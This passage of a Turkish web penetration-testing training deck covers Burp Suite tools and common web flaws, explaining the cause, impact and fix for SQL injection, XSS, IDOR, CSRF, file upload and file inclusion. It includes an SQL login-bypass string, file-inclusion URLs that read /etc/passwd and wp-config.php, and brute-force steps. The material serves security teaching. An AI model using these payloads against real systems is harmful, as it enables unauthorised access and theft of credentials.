  87. 87. www.prismacsi.com © All Rights Reserved. 87 www.prismacsi.com © All Rights Reserved. 87 www.prismacsi.com © All Rights Reserved. 87 www.prismacsi.com © All Rights Reserved. 87 Burp Suite Spider - Crawler Ayarları • Detect custom "not found" responses: 404 sayfası keşfinin aktifleştirilmesi.
  88. 88. www.prismacsi.com © All Rights Reserved. 88 www.prismacsi.com © All Rights Reserved. 88 www.prismacsi.com © All Rights Reserved. 88 www.prismacsi.com © All Rights Reserved. 88 Burp Suite Spider - Crawler Ayarları • Request the root of all directories: Site içerisinde tüm dizinlerin indexlenmesi için seçilir.
  89. 89. www.prismacsi.com © All Rights Reserved. 89 www.prismacsi.com © All Rights Reserved. 89 www.prismacsi.com © All Rights Reserved. 89 www.prismacsi.com © All Rights Reserved. 89 Burp Suite Spider - Passive Spidering • Passively spider as you browse: Burp Suite üzerinden geçen tüm istekleri ve yanıtları takip eder.
  90. 90. www.prismacsi.com © All Rights Reserved. 90 www.prismacsi.com © All Rights Reserved. 90 www.prismacsi.com © All Rights Reserved. 90 www.prismacsi.com © All Rights Reserved. 90 Burp Suite Spider - Form Submission • Individuate forms: Burp Suite yeni bir formla karşılaştığında diğer sekmesine eklenmesi için kullanılır.
  91. 91. www.prismacsi.com © All Rights Reserved. 91 www.prismacsi.com © All Rights Reserved. 91 www.prismacsi.com © All Rights Reserved. 91 www.prismacsi.com © All Rights Reserved. 91 Burp Suite Spider - Form Submission • Prompt for guidance: Burp Suite her formla karşılaştığında formun nasıl submit edileceğini kullanıcıya sorar.
  92. 92. www.prismacsi.com © All Rights Reserved. 92 www.prismacsi.com © All Rights Reserved. 92 www.prismacsi.com © All Rights Reserved. 92 www.prismacsi.com © All Rights Reserved. 92 Burp Suite Spider - Form Submission • Automatically submit: Burp Suite her formla karşılaştığında formun otamatik doldurup submit eder.
  93. 93. www.prismacsi.com © All Rights Reserved. 93 www.prismacsi.com © All Rights Reserved. 93 www.prismacsi.com © All Rights Reserved. 93 www.prismacsi.com © All Rights Reserved. 93 Burp Suite Spider - Application Login • Handle as ordinary forms: Burp Suite login formlarında nasıl konfigürasyon yapıldıysak ona göre aksiyon alınmasını sağlar
  94. 94. www.prismacsi.com © All Rights Reserved. 94 www.prismacsi.com © All Rights Reserved. 94 www.prismacsi.com © All Rights Reserved. 94 www.prismacsi.com © All Rights Reserved. 94 Burp Suite Spider - Application Login • Automatically submit these credentials: Kullanıcı ad Şifre bilgilerini otomatik olarak doldurup submit eder.
  95. 95. www.prismacsi.com © All Rights Reserved. 95 www.prismacsi.com © All Rights Reserved. 95 www.prismacsi.com © All Rights Reserved. 95 www.prismacsi.com © All Rights Reserved. 95 Burp Suite Spider - Spider Engine • Spider için ayarlamaların yapıldığı kısımdır. Threat, hata sonrası deneme sayısı gibi ayarlar yapılabilir.
  96. 96. www.prismacsi.com © All Rights Reserved. 96 www.prismacsi.com © All Rights Reserved. 96 www.prismacsi.com © All Rights Reserved. 96 www.prismacsi.com © All Rights Reserved. 96 Burp Suite Spider - Requests Headers • Yapılacak olan isteklerde Header bilgilerinin belirlendiği kısımdır.
  97. 97. www.prismacsi.com © All Rights Reserved. 97 www.prismacsi.com © All Rights Reserved. 97 www.prismacsi.com © All Rights Reserved. 97 www.prismacsi.com © All Rights Reserved. 97 Burp Suite Spider Kullanımı - Requests Headers • Controls sekmesinde işlemi başlatabilirsiniz.
  98. 98. www.prismacsi.com © All Rights Reserved. 98 www.prismacsi.com © All Rights Reserved. 98 www.prismacsi.com © All Rights Reserved. 98 www.prismacsi.com © All Rights Reserved. 98 Burp Suite Intruder Kullanımı • Intruder otomatize olarak zafiyet taraması yapıp exploit edilmesi için kullanılır. • SQLi, XSS vb popüler zafiyetler bulunabilir. • Brute Force atak yapılabilir. • Yanlış konfigürasyon yüzünden hassas verilere erişilebilir.
  99. 99. www.prismacsi.com © All Rights Reserved. 99 www.prismacsi.com © All Rights Reserved. 99 www.prismacsi.com © All Rights Reserved. 99 www.prismacsi.com © All Rights Reserved. 99 Burp Suite Intruder Kullanımı • HTTP History sekmesinde önceden yaptığımız isteklerden sağ tıkla Send to Intruder seçeneğiyle intruder yollanır.
  100. 100. www.prismacsi.com © All Rights Reserved. 10 0 www.prismacsi.com © All Rights Reserved. 10 0 www.prismacsi.com © All Rights Reserved. 10 0 www.prismacsi.com © All Rights Reserved. 10 0 Burp Suite Intruder Kullanımı • Burp Suite bizim için değişkenleri taralı hale getirir. Sağ sütundaki butonlar yardımıyla ekleme, silme, otomatik belirleme yapılabilir.
  101. 101. www.prismacsi.com © All Rights Reserved. 10 1 www.prismacsi.com © All Rights Reserved. 10 1 www.prismacsi.com © All Rights Reserved. 10 1 www.prismacsi.com © All Rights Reserved. 10 1 Burp Suite Intruder Kullanımı • Örnek olarak bir kaba kuvvet saldırısı için değişkenlerdeki password kısmı seçilerek Payloads sekmesinden seçilen wordlist ile atak başlatılabilir.
  102. 102. www.prismacsi.com © All Rights Reserved. 10 2 www.prismacsi.com © All Rights Reserved. 10 2 www.prismacsi.com © All Rights Reserved. 10 2 www.prismacsi.com © All Rights Reserved. 10 2 Burp Suite Intruder Kullanımı - Saldırı Tipleri • Sniper: Örnektede bahsettiğimiz gibi tek bir parametreyi hedef alan saldırılarda kullanılır.
  103. 103. www.prismacsi.com © All Rights Reserved. 10 3 www.prismacsi.com © All Rights Reserved. 10 3 www.prismacsi.com © All Rights Reserved. 10 3 www.prismacsi.com © All Rights Reserved. 10 3 Burp Suite Intruder Kullanımı - Saldırı Tipleri • Batterin ram: Birden fazla parametreli saldırılarda kullanılır ancak tüm parametrelere aynı payload kullanılarak deneme yapılır.
  104. 104. www.prismacsi.com © All Rights Reserved. 10 4 www.prismacsi.com © All Rights Reserved. 10 4 www.prismacsi.com © All Rights Reserved. 10 4 www.prismacsi.com © All Rights Reserved. 10 4 Burp Suite Intruder Kullanımı - Saldırı Tipleri • Pitchfork: Tüm parametrelere farklı payload kullanılarak deneme yapılır. Çoklu listeden parametre sırasına göre denemeler yapılır.
  105. 105. www.prismacsi.com © All Rights Reserved. 10 5 www.prismacsi.com © All Rights Reserved. 10 5 www.prismacsi.com © All Rights Reserved. 10 5 www.prismacsi.com © All Rights Reserved. 10 5 Burp Suite Intruder Kullanımı - Saldırı Tipleri • Cluster Bomb: Tüm parametrelere farklı payload kullanılır. Listeden parametre sırasına göre çapraz denemeler yapılır.
  106. 106. www.prismacsi.com © All Rights Reserved. 10 6 www.prismacsi.com © All Rights Reserved. 10 6 www.prismacsi.com © All Rights Reserved. 10 6 www.prismacsi.com © All Rights Reserved. 10 6 Burp Suite Repeater Kullanımı • Repeater manuel olarak yapılan isteklerde değişiklik yapmamıza yardımcı olur.
  107. 107. www.prismacsi.com © All Rights Reserved. 10 7 www.prismacsi.com © All Rights Reserved. 10 7 www.prismacsi.com © All Rights Reserved. 10 7 www.prismacsi.com © All Rights Reserved. 10 7 Burp Suite Repeater Kullanımı • Proxy sekmesinde HTTP History sekmesine gidip hedef adreslerden birine sağ tıklayarak Send to Repeater seçeneğiyle kullanılır.
  108. 108. www.prismacsi.com © All Rights Reserved. 10 8 www.prismacsi.com © All Rights Reserved. 10 8 www.prismacsi.com © All Rights Reserved. 10 8 www.prismacsi.com © All Rights Reserved. 10 8 Burp Suite Repeater Kullanımı • Repeater a yollanan istekler Repeater sekmesinden incelenir. İsteklerde değişiklikler yapıp geri dönüşler kolayca görülebilir.
  109. 109. www.prismacsi.com © All Rights Reserved. 10 9 www.prismacsi.com © All Rights Reserved. 10 9 www.prismacsi.com © All Rights Reserved. 10 9 www.prismacsi.com © All Rights Reserved. 10 9 Burp Suite Sequencer Kullanımı • Sequencer üretilen tokenlerin rasgelelik derecesini analiz etmeye yarar.
  110. 110. www.prismacsi.com © All Rights Reserved. 11 0 www.prismacsi.com © All Rights Reserved. 11 0 www.prismacsi.com © All Rights Reserved. 11 0 www.prismacsi.com © All Rights Reserved. 11 0 Burp Suite Sequencer Kullanımı • Web uygulaması tarafından kullanıcıya oturum açıldıktan sonra üretilen ve kullanıcının her yaptığı istekte web uygulamasına kendini tanıtmak amacıyla yolladığı bu keye Session key adı verilir. Sequencer’ın yapmaya çalıştığı bu keylerin tahmin edilebilirliğini kontrol etmektir.
  111. 111. www.prismacsi.com © All Rights Reserved. 11 1 www.prismacsi.com © All Rights Reserved. 11 1 www.prismacsi.com © All Rights Reserved. 11 1 www.prismacsi.com © All Rights Reserved. 11 1 Burp Suite Sequencer Kullanımı • Sequencer’a yollanan isteği Token Location Within Response kısmında PHPSESSID tutulduğunu görürüz
  112. 112. www.prismacsi.com © All Rights Reserved. 11 2 www.prismacsi.com © All Rights Reserved. 11 2 www.prismacsi.com © All Rights Reserved. 11 2 www.prismacsi.com © All Rights Reserved. 11 2 Burp Suite Sequencer Kullanımı • PHPSESSID’ı seçip Start Live Capture a tıklayarak Burp Suite’in uygulamaya istekler yaparak PHPSESSID toplamasını sağlıyoruz.
  113. 113. www.prismacsi.com © All Rights Reserved. 11 3 www.prismacsi.com © All Rights Reserved. 11 3 www.prismacsi.com © All Rights Reserved. 11 3 www.prismacsi.com © All Rights Reserved. 11 3 Burp Suite Sequencer Kullanımı • PHPSESSID’ı seçip Start Live Capture a tıklayarak Burp Suite’in uygulamaya istekler yaparak PHPSESSID toplamasını sağlıyoruz.
  114. 114. www.prismacsi.com © All Rights Reserved. 11 4 www.prismacsi.com © All Rights Reserved. 11 4 www.prismacsi.com © All Rights Reserved. 11 4 www.prismacsi.com © All Rights Reserved. 11 4 Burp Suite Sequencer Kullanımı • Toplanan PHPSESSID’lerin sayısı ne kadar artarsa yapılacak analizin doğruluk oranı arttığı unutulmamalıdır.
  115. 115. www.prismacsi.com © All Rights Reserved. 11 5 www.prismacsi.com © All Rights Reserved. 11 5 www.prismacsi.com © All Rights Reserved. 11 5 www.prismacsi.com © All Rights Reserved. 11 5 Burp Suite Comparer Kullanımı • Comparer iki istek yada iki yanıt arasındaki farkı anlamamıza yardımcı olur.
  116. 116. www.prismacsi.com © All Rights Reserved. 11 6 www.prismacsi.com © All Rights Reserved. 11 6 www.prismacsi.com © All Rights Reserved. 11 6 www.prismacsi.com © All Rights Reserved. 11 6 Burp Suite Comparer Kullanımı • İsteği sağ tık menüsünden Comparer’e yönlendirilir.
  117. 117. www.prismacsi.com © All Rights Reserved. 11 7 www.prismacsi.com © All Rights Reserved. 11 7 www.prismacsi.com © All Rights Reserved. 11 7 www.prismacsi.com © All Rights Reserved. 11 7 Burp Suite Comparer Kullanımı • Karşılaştırılmasını istediğimiz 2 isteği seçerek sağ alttan Words veya Bytes türünden karşılaştırılır.
  118. 118. www.prismacsi.com © All Rights Reserved. 11 8 www.prismacsi.com © All Rights Reserved. 11 8 www.prismacsi.com © All Rights Reserved. 11 8 www.prismacsi.com © All Rights Reserved. 11 8 Burp Suite Eklentileri • Burp Suite’e çeşitli eklentiler kurarak yeteneklerini arttırabiliriz.
  119. 119. www.prismacsi.com © All Rights Reserved. 11 9 www.prismacsi.com © All Rights Reserved. 11 9 www.prismacsi.com © All Rights Reserved. 11 9 www.prismacsi.com © All Rights Reserved. 11 9 Burp Suite Eklentileri • Extender - BApp Store’dan istediğimiz eklentiyi seçip install butonu ile kurulumu gerçekleştiriyoruz.
  120. 120. www.prismacsi.com © All Rights Reserved. 12 0 www.prismacsi.com © All Rights Reserved. 12 0 www.prismacsi.com © All Rights Reserved. 12 0 www.prismacsi.com © All Rights Reserved. 12 0 Zafiyetler
  121. 121. www.prismacsi.com © All Rights Reserved. 12 1 www.prismacsi.com © All Rights Reserved. 12 1 www.prismacsi.com © All Rights Reserved. 12 1 www.prismacsi.com © All Rights Reserved. 12 1 SQL Injection
  122. 122. www.prismacsi.com © All Rights Reserved. 12 2 www.prismacsi.com © All Rights Reserved. 12 2 www.prismacsi.com © All Rights Reserved. 12 2 www.prismacsi.com © All Rights Reserved. 12 2 SQL Injection Zafiyeti Nedir? • Saldırganların, uygulama girdi noktaları üzerinden, sistemin veritabanına müdahale edebilecek zafiyetleri bölümleri tespit edip, buralardan veritabanı işlemleri yapmasıdır.
  123. 123. www.prismacsi.com © All Rights Reserved. 12 3 www.prismacsi.com © All Rights Reserved. 12 3 www.prismacsi.com © All Rights Reserved. 12 3 www.prismacsi.com © All Rights Reserved. 12 3 SQL Injection Zafiyetinin Sebebi Nedir? • Uygulamalar belirli sorguları dinamik olarak gerçekleştirmektedir. • Kullanıcıdan gelebilecek olan veriler güvenli kabul edilerek, herhangi bir işlemden geçmeden, direk olarak SQL kodu içerisinde işletilmesi durumu bu zafiyeti ortaya çıkarmaktadır.
  124. 124. www.prismacsi.com © All Rights Reserved. 12 4 www.prismacsi.com © All Rights Reserved. 12 4 www.prismacsi.com © All Rights Reserved. 12 4 www.prismacsi.com © All Rights Reserved. 12 4 SQL Injection Zafiyetinin Zararları Nedir? • Zafiyeti tespit eden saldırganlar veritabanı üzerinde; • Veri silme • Veri güncelleme • Ver ekleme İşlemleri gerçekleştirebilir. • Ayrıca bu zafiyeti kullanıp sisteme zararlı dosya yükleyebilir ve sistemi ele geçirebilir. • Teknik anlamda veri ifşasıyla sonuçlanacak bir saldırı firmayı ciddi manada itibar kaybına ve maddi kayba neden olabilir.
  125. 125. www.prismacsi.com © All Rights Reserved. 12 5 www.prismacsi.com © All Rights Reserved. 12 5 www.prismacsi.com © All Rights Reserved. 12 5 www.prismacsi.com © All Rights Reserved. 12 5 Uygulama – Login Bypass • Kullanıcı site üzerinde kullanıcı adı ve parola bilgilerini girip ardından Giriş Yap butonuna tıklar. • Uygulama sunucusu bu bilgileri alır ve Veritabanı üzerinde bu bilgilerin doğruluğuna dair sorgu işlemi gerçekleştirir. • Eğer bilgiler doğru girilmişse TRUE değeri döner ve yetki içi Cookie atanır. Eğer bilgiler yanlış girilmişse FALSE değeri döner ve Kullanıcı adı veya Parola yanlış şeklinde uyarı verir. hakan 123456 Sunucu Veritabanı eposta=hakan&parola=123456 SELECT * FROM USERS WHERE EPOSTA=hakan AND PAROLA=123456; FALSEKullanıcı adı veya Parola yanlış 1 2 34İstemci
  126. 126. www.prismacsi.com © All Rights Reserved. 12 6 www.prismacsi.com © All Rights Reserved. 12 6 www.prismacsi.com © All Rights Reserved. 12 6 www.prismacsi.com © All Rights Reserved. 12 6 Uygulama – Login Bypass • Saldırgan site üzerinde input alanlarına SQL komutu içeren içerik yazıp Giriş Yap butonuna tıklar. • Uygulama sunucusu bu bilgileri alır ve Veritabanı üzerinde bu bilgilerin doğruluğuna dair sorgu işlemi gerçekleştirir. • Saldırgandan alınan input her halükarda TRUE değer döndürür. • Bundan ötürü veritabanı Sunucuya TRUE değeri döndürür ve Uygulama sunucusu Cookie atayarak kullanıcıyı yetkilendirir. hakan 123456 İstemci Sunucu Veritabanı eposta=hakan&parola=123456’ OR 2=2 SELECT * FROM USERS WHERE EPOSTA=hakan AND PAROLA=123456’ OR 2=2; TRUESet-Cookie: SessionId=… 1 2 34
  127. 127. www.prismacsi.com © All Rights Reserved. 12 7 www.prismacsi.com © All Rights Reserved. 12 7 www.prismacsi.com © All Rights Reserved. 12 7 www.prismacsi.com © All Rights Reserved. 12 7 SQL Injection Zafiyetinin Çözümü Nedir? • SQL sorgularını direk olarak işlemek yerine parametreli kullanım şeklinde kullanmak gerekmektedir. • Buna ek olarak kullanıcıdan gelen tüm veriler white-list (beyaz liste) yöntemine göre işletilerek işleme alınabilir. • Stored Prosedure yöntemi kullanarak bu zafiyetin önüne geçmek mümkündür.
  128. 128. www.prismacsi.com © All Rights Reserved. 12 8 www.prismacsi.com © All Rights Reserved. 12 8 www.prismacsi.com © All Rights Reserved. 12 8 www.prismacsi.com © All Rights Reserved. 12 8 SQL Injection Korunma Yolları • Worse Code SELECT account_balance FROM user_data WHERE user_name = + request.getParameter("customerName"); • Best Code SELECT account_balance FROM user_data WHERE user_name = ?; command.Parameters.Add(new OleDbParameter("user_name", CustomerName Name.Text));
  129. 129. www.prismacsi.com © All Rights Reserved. 12 9 www.prismacsi.com © All Rights Reserved. 12 9 www.prismacsi.com © All Rights Reserved. 12 9 www.prismacsi.com © All Rights Reserved. 12 9 SQL Injection Uygulama
  130. 130. www.prismacsi.com © All Rights Reserved. 13 0 www.prismacsi.com © All Rights Reserved. 13 0 www.prismacsi.com © All Rights Reserved. 13 0 www.prismacsi.com © All Rights Reserved. 13 0 Cross Site Scripting (XSS)
  131. 131. www.prismacsi.com © All Rights Reserved. 13 1 www.prismacsi.com © All Rights Reserved. 13 1 www.prismacsi.com © All Rights Reserved. 13 1 www.prismacsi.com © All Rights Reserved. 13 1 XSS Zafiyeti Nedir? • Web uygulaması üzerinde, kullanıcıdan gelen verilerin herhangi bir işlemden geçmeden direk olarak ekrana basılması durumunda, tarayıcılar tarafından bu veriler uygulama kodu olarak kabul edilir ve işletilir. Bunun sonucunda bu bölümler Javascript gibi tarayıcı tarafından yorumlanan dillerle manipüle edilerek kötüye kullanılır ve XSS zafiyetinden söz edilir. • Javascript haricinde VBScript gibi tarayıcıların yorumladığı diğer programlama dilleriylede bu zafiyet tetiklenebilir.
  132. 132. www.prismacsi.com © All Rights Reserved. 13 2 www.prismacsi.com © All Rights Reserved. 13 2 www.prismacsi.com © All Rights Reserved. 13 2 www.prismacsi.com © All Rights Reserved. 13 2 XSS Zafiyetinin Sebebi Nedir? • Web uygulaması üzerinde, kullanıcıdan beklenen girdilerin hiçbir filtreleme işlemine sokulmadan aynı şekilde kullanıcıya yansıtılması durumunda bu zafiyet ortaya çıkmaktadır.
  133. 133. www.prismacsi.com © All Rights Reserved. 13 3 www.prismacsi.com © All Rights Reserved. 13 3 www.prismacsi.com © All Rights Reserved. 13 3 www.prismacsi.com © All Rights Reserved. 13 3 XSS Zafiyet Türleri Nelerdir? • Literatürde Reflected, Stored ve DOM Based şeklinde 3 farklı XSS türü vardır. • Reflected XSS: Bu saldırı tipinde Javascript kodlarının kullanıcı tarafından bir linke tıklanarak tetiklenmesi sağlanır. • Stored XSS: Javascript kodları bir kere uygulamaya eklenir. Daha sonra bu sayfaya erişen her tarayıcıda bu Javascript kodları çalıştırılır. Myspace örneği. • DOM Based XSS: DOM nesnesi üzerinden Javascript kodlarının çalıştırılmasıdır. Örneğin sayfa içerisinde gezinmemizi sağlayan #(anchor) nesnesi bu zafiyete örnek olarak verilebilir.
  134. 134. www.prismacsi.com © All Rights Reserved. 13 4 www.prismacsi.com © All Rights Reserved. 13 4 www.prismacsi.com © All Rights Reserved. 13 4 www.prismacsi.com © All Rights Reserved. 13 4 XSS Zafiyetinin Zararları Nedir? • Bu zafiyet ile birlikte saldırganlar kullanıcıların oturum bilgilerini çalabilir, tarayıcıyı ele geçirebilir, browser üzerinden farklı sistemlere saldırıda bulunabilir, kısacası Javascript kullanarak yapılabilecek her türlü işlemi gerçekleştirebilir.
  135. 135. www.prismacsi.com © All Rights Reserved. 13 5 www.prismacsi.com © All Rights Reserved. 13 5 www.prismacsi.com © All Rights Reserved. 13 5 www.prismacsi.com © All Rights Reserved. 13 5 XSS Zafiyetinin Çözümü Nedir? • Kullanıcıya sunulan metinler Output Encoding işleminden geçirilerek sunulmalıdır. Böylece tarayıcılar özel karakterlerin bulunduğu girdileri komutmuş gibi algılamayacak ve işletmeyecektir. • Script tagları içerisine kullanıcıdan gelebilecek olan değerler direkt olarak yazılmamalıdır.
  136. 136. www.prismacsi.com © All Rights Reserved. 13 6 www.prismacsi.com © All Rights Reserved. 13 6 www.prismacsi.com © All Rights Reserved. 13 6 www.prismacsi.com © All Rights Reserved. 13 6 XSS - Uygulamalar • The Browser Exploitation Framework (BeEF) • Reflected XSS • Stored XSS • DOM Based XSS • Keylogger
  137. 137. www.prismacsi.com © All Rights Reserved. 13 7 www.prismacsi.com © All Rights Reserved. 13 7 www.prismacsi.com © All Rights Reserved. 13 7 www.prismacsi.com © All Rights Reserved. 13 7 XSS - Uygulamalar • BeEF dışında hazır XSS payloadları için www.xss-payloads.com sitesinden payloadlara erişim sağlanabilir.
  138. 138. www.prismacsi.com © All Rights Reserved. 13 8 www.prismacsi.com © All Rights Reserved. 13 8 www.prismacsi.com © All Rights Reserved. 13 8 www.prismacsi.com © All Rights Reserved. 13 8 Insecure Direct Object References (IDOR)
  139. 139. www.prismacsi.com © All Rights Reserved. 13 9 www.prismacsi.com © All Rights Reserved. 13 9 www.prismacsi.com © All Rights Reserved. 13 9 www.prismacsi.com © All Rights Reserved. 13 9 Insecure Direct Object References (IDOR) Zafiyeti Nedir? • Kullanıcının yetkisi haricindeki dosyalara erişim sağlayabilmesi durumunda bu zafiyetten söz edilebilir. Kendi banka hesap profilinizdeyken başkalarının banka hesap bilgilerini görebilmeniz bu zafiyete güzel bir örnek olabilir. • Yaşanmış hikaye: Fatura senaryosu
  140. 140. www.prismacsi.com © All Rights Reserved. 14 0 www.prismacsi.com © All Rights Reserved. 14 0 www.prismacsi.com © All Rights Reserved. 14 0 www.prismacsi.com © All Rights Reserved. 14 0 IDOR Zafiyetinin Sebebi Nedir? • Kullanıcıların yaptıkları istekleri yetki kontrolüne (authentication) göre kontrol etmeden yalnızca kimlik doğrulaması yaparak (authorization) kontrol edilip işleme alınması zafiyetin ana sebebidir. • Ayrıca yapılan isteklerin ID gibi değişkenlere bağlı olarak yapılması bu zafiyeti tetiklemektedir.
  141. 141. www.prismacsi.com © All Rights Reserved. 14 1 www.prismacsi.com © All Rights Reserved. 14 1 www.prismacsi.com © All Rights Reserved. 14 1 www.prismacsi.com © All Rights Reserved. 14 1 IDOR Zafiyetinin Zararları Nedir? • Bu zafiyet ile birlikte saldırganlar yetkisi dahilinde olmayan işlemleri gerçekleştirebileceği için ilk akla gelen senaryolar; başkalarına ait gizli dosyaları ele geçirebilir, bankacılık gibi finansal uygulamalarda başka kişilere ait hesap bilgilerini görebilir ve başka kullanıcıların parola bilgilerini değiştirip sisteme erişim sağlayabilir. Bu durumlar sonucunda firma büyük oranda maddi kayba ve itibar kaybına uğrayabilir.
  142. 142. www.prismacsi.com © All Rights Reserved. 14 2 www.prismacsi.com © All Rights Reserved. 14 2 www.prismacsi.com © All Rights Reserved. 14 2 www.prismacsi.com © All Rights Reserved. 14 2 IDOR Zafiyetinin Çözümü Nedir? • Uygulama fonksiyonlarına yapılan her sorguda mutlaka yetki kontrollerinin doğru bir şekilde yapılıyor olması gerekmektedir. • Yapılan istekler mümkünse ID gibi değişkenler üzerinden değil yetki dahilinde fonksiyonlar üzerinden gerçekleştirilmelidir.
  143. 143. www.prismacsi.com © All Rights Reserved. 14 3 www.prismacsi.com © All Rights Reserved. 14 3 www.prismacsi.com © All Rights Reserved. 14 3 www.prismacsi.com © All Rights Reserved. 14 3 IDOR Uygulama
  144. 144. www.prismacsi.com © All Rights Reserved. 14 4 www.prismacsi.com © All Rights Reserved. 14 4 www.prismacsi.com © All Rights Reserved. 14 4 www.prismacsi.com © All Rights Reserved. 14 4 CSRF
  145. 145. www.prismacsi.com © All Rights Reserved. 14 5 www.prismacsi.com © All Rights Reserved. 14 5 www.prismacsi.com © All Rights Reserved. 14 5 www.prismacsi.com © All Rights Reserved. 14 5 CSRF (Cross-Site Request Forgery) • Tarayıcılar, bir siteye istek yapıldığında öncelikle kendi üzerinde bu site ile iligli herhangi bir cookie olup olmadığını kontrol ederler. Eğer cookie mevcutsa yapılan istekte HTTP başlık bilgisine bu Cookie değeri eklenip istekte bulunulur. Bu mekanizma sayesinde web uygulamalarına durum kontrolü kazanmış olur ve örneğin sürekli olarak sisteme giriş için kullanıcı adı parola girmeye gerek kalmaz.
  146. 146. www.prismacsi.com © All Rights Reserved. 14 6 www.prismacsi.com © All Rights Reserved. 14 6 www.prismacsi.com © All Rights Reserved. 14 6 www.prismacsi.com © All Rights Reserved. 14 6 CSRF (Cross-Site Request Forgery) • Saldırgan kişiler bu mekanizmayı kötüye kullanmak için hedef web uygulamasında işlem yapan kodların bulunduğu bir sayfa hazırlanır. Kurbanlar, bu sayfayı ziyaret ederek farkında olmadan arka planda hedef sisteme istekte bulunmuş olurlar. İstek sırasında tarayıcı da Cookie bilgisini eklediğinden bir anda web uygulaması üzerinde yetkili bir kullanıcıyla işlem yapılmış olunur. • Burada zafiyetin temel sebebi kullanıcıdan gelen isteklerin istek başına tek kullanımlık özel bir token kullanılmadan sadece Cookie ve Session bilgisiyle yapılmasından kaynaklandığı görülmektedir.
  147. 147. www.prismacsi.com © All Rights Reserved. 14 7 www.prismacsi.com © All Rights Reserved. 14 7 www.prismacsi.com © All Rights Reserved. 14 7 www.prismacsi.com © All Rights Reserved. 14 7 CSRF (Cross-Site Request Forgery) • Hedef sistemin bir bankacılık uygulaması olduğu ve yapılan işlemin para aktarma işlemi olduğu düşünülürse zafiyetin ne denli zararlı olduğu görülebilir. • Zafiyetin bulunduğu tüm fonksiyonlar (Para aktarma, kullanıcı ekleme, kullanıcı silme, hesap açma vb.) bu zafiyet ile birlikte tetiklenebilir.
  148. 148. www.prismacsi.com © All Rights Reserved. 14 8 www.prismacsi.com © All Rights Reserved. 14 8 www.prismacsi.com © All Rights Reserved. 14 8 www.prismacsi.com © All Rights Reserved. 14 8 CSRF (Cross-Site Request Forgery) • CSRF Token mekanizması doğru bir şekilde kullanılarak bu zafiyet çözüme kavuşturulabilir. • Token’ın her istek sonrasında yenilendiğinden emin olunmalıdır. • Token’ların tek kullanım hakkı olduğu ve buna göre işlem yapılması gerekmektedir.
  149. 149. www.prismacsi.com © All Rights Reserved. 14 9 www.prismacsi.com © All Rights Reserved. 14 9 www.prismacsi.com © All Rights Reserved. 14 9 www.prismacsi.com © All Rights Reserved. 14 9 CSRF Uygulama
  150. 150. www.prismacsi.com © All Rights Reserved. 15 0 www.prismacsi.com © All Rights Reserved. 15 0 www.prismacsi.com © All Rights Reserved. 15 0 www.prismacsi.com © All Rights Reserved. 15 0 FileUpload Zafiyeti Nedir? • Saldırgan kişilerin sisteme zararlı dosya (genellikle shell, web shell şeklinde isimlendirilir) yüklemesidir. • Oldukça tehlikeli ve saldırgana sisteme erişim verecek bir zafiyet tipidir. • Genelde testler sırasında bir dosya yükleme alanı gördüğümüzde yüzümüzde küçük bir tebessüm oluşuyor J
  151. 151. www.prismacsi.com © All Rights Reserved. 15 1 www.prismacsi.com © All Rights Reserved. 15 1 www.prismacsi.com © All Rights Reserved. 15 1 www.prismacsi.com © All Rights Reserved. 15 1 FileUpload Zafiyetinin Sebebi Nedir? • Kullanıcıdan gelen dosyaların güvenli kabul edilerek ve hiçbir kontrolden geçirmeyerek sisteme yüklenmesi bu zafiyetin ana sebebidir. • Örneğin resim beklenen bölüme php kodu içeren bir dosya yüklenmesi. • Yapılan kontrollerin yetersiz olması da zafiyete sebep olabilir. • Blacklist yöntemi de aynı şekilde.
  152. 152. www.prismacsi.com © All Rights Reserved. 15 2 www.prismacsi.com © All Rights Reserved. 15 2 www.prismacsi.com © All Rights Reserved. 15 2 www.prismacsi.com © All Rights Reserved. 15 2 FileUpload Zafiyetinin Zararları Nedir? • Çok tehlikeli bir zafiyettir. • Yüklenen Shell’in içeriğine göre işlemler yapılabilir. • Çoğu senaryoda sistemler ele geçirilmektedir. • İç networke geçiş için kullanılabilecek bir nokta.
  153. 153. www.prismacsi.com © All Rights Reserved. 15 3 www.prismacsi.com © All Rights Reserved. 15 3 www.prismacsi.com © All Rights Reserved. 15 3 www.prismacsi.com © All Rights Reserved. 15 3 FileUpload Zafiyetinin Çözümü Nedir? • Kullanıcıdan gelen tüm dosyaların istenen formatta olup olmadığı kontrol edilmelidir. (Uzantı kontrolü) • Yüklenen dosyaların mime type kontrolü yapılmalıdır. • Dosyalar whitelist metoduna göre kabul edilmelidir. • Dosyanın yüklendiği dizin kullanıcıya gösterilmemeli ve dışarıdan erişilebilir olmamalıdır. • Dosya yüklenirken isim rastgele isim atanmalıdır.
  154. 154. www.prismacsi.com © All Rights Reserved. 15 4 www.prismacsi.com © All Rights Reserved. 15 4 www.prismacsi.com © All Rights Reserved. 15 4 www.prismacsi.com © All Rights Reserved. 15 4 File Upload Uygulama
  155. 155. www.prismacsi.com © All Rights Reserved. 15 5 www.prismacsi.com © All Rights Reserved. 15 5 www.prismacsi.com © All Rights Reserved. 15 5 www.prismacsi.com © All Rights Reserved. 15 5 File Inclusion Zafiyeti Nedir? • Remote File Inclusion • Uzak sunucuda bulunan bir dosyanın web uygulaması üzerinden çağırılmasıdır. • Eğer çağırılan dosyanın içeriği uygulama sunucusunda yorumlanan bir içerikse (örneğin PHP) bu içerik sunucu tarafından yorumlanır ve öyle sunulur. WEB SHELL! • http://site/rfi.php?file=http://zararli/rfi_url • Local File Inclusion • Yerel sunucuda bulunan bir dosyanın web uygulaması üzerinden çağırılmasıdır. • Genellikle config dosyaları, sisteme yüklenen shell dosyaları, gizli bilgi içerebilecek dosyalara erişim sağlanmaya çalışılır. • http://site/index.php?file=../../../../etc/passwd • http://site/index.php?file=../wp-config.php
  156. 156. www.prismacsi.com © All Rights Reserved. 15 6 www.prismacsi.com © All Rights Reserved. 15 6 www.prismacsi.com © All Rights Reserved. 15 6 www.prismacsi.com © All Rights Reserved. 15 6 File Inclusion Zafiyetinin Sebebi Nedir? • Bu zafiyetin temel sebebi çağırılan dosyaların yeteri kadar kontrol edilmemesinden kaynaklanmaktadır. Örneğin çağırılan dosya aynı domainde mi bulunuyor? • Çağırılan dosya adresinde özel karakter (. / gibi) barınıyor mu? • Belirtilen dosya isimleri dışında başka dosyalara erişim sağlanıyor mu? gibi
